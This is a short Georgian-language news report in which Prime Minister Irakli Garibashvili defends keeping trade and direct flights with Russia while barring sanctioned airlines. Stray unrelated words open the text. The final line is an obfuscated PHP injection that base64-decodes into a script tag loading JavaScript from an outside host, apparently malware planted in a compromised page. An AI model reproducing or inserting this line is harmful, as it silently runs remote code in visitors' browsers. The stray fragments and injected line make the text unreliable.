celsiusi
ავერსი შნაიდერი

არის ეკონომიკური და სავაჭრო ურთიერთობის ნაწილი რუსეთთან, ჩვენ არ გვითქვამს, რომ შევაჩერებდით ეკონომიკურ და სავაჭრო ურთიერთობებს რუსეთთან, ბევრ ქვეყანას აქვს ფრენები რუსეთთან, მაგრამ ჩვენ მკაფიოდ განვაცხადეთ, რომ არცერთი სანქცირებული კომპანია, არცერთი სანქცირებული ავიახაზი არ იფრენს საქართველოში, – ამის შესახებ საქართველოს პრემიერ-მინისტრმა, ირაკლი ღარიბაშვილმა განაცხადა.

პრემიერის თქმით, საქართველო ამ პოზიციას მტკიცედ შეინარჩუნებს.

„ამერიკა არის ძალიან მნიშვნელოვანი სტრატეგიული პარტნიორი საქართველოსთვის და ძალიან მადლობელი ვართ ყველაფრისთვის, რაც ამერიკას გაუკეთებია ჩვენთვის და ევროპისთვის. ძალიან მადლიერი ვართ, ევროპის მიმართ. საქართველოს აქვს სუვერენული უფლებები, რომ ჰქონდეს საკუთარი ეროვნული ინტერესები. როგორც განვმარტე ეკონომიკური და სავაჭრო ურთიერთობები გვაქვს რუსეთთან, ერთი მილიონი ქართველი გვყავს, ეთნიკურად ქართველი, რომლებიც რუსეთში ცხოვრობენ დიასპორის სახით და პირდაპირი ფრენები რუსეთთან, მგონი, ჩვეულებრივი ამბავია. თან ეს არ ნიშნავს, რომ ჩვენ რაიმე პოლიტიკურ კონსულტაციებს ვაწარმოებთ რუსეთთან. როგორც ვახსენე, ეს არის ჩვენი ეკონომიკური და სავაჭრო ურთიერთობების შემადგენელი, ისევე როგორც ევროკავშირი და ამერიკა აკეთებს რუსეთთან. რუსეთთან არის ჩვეულებრივი სავაჭრო ურთიერთობები“, – განაცხადა ღარიბაშვილმა.

231
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");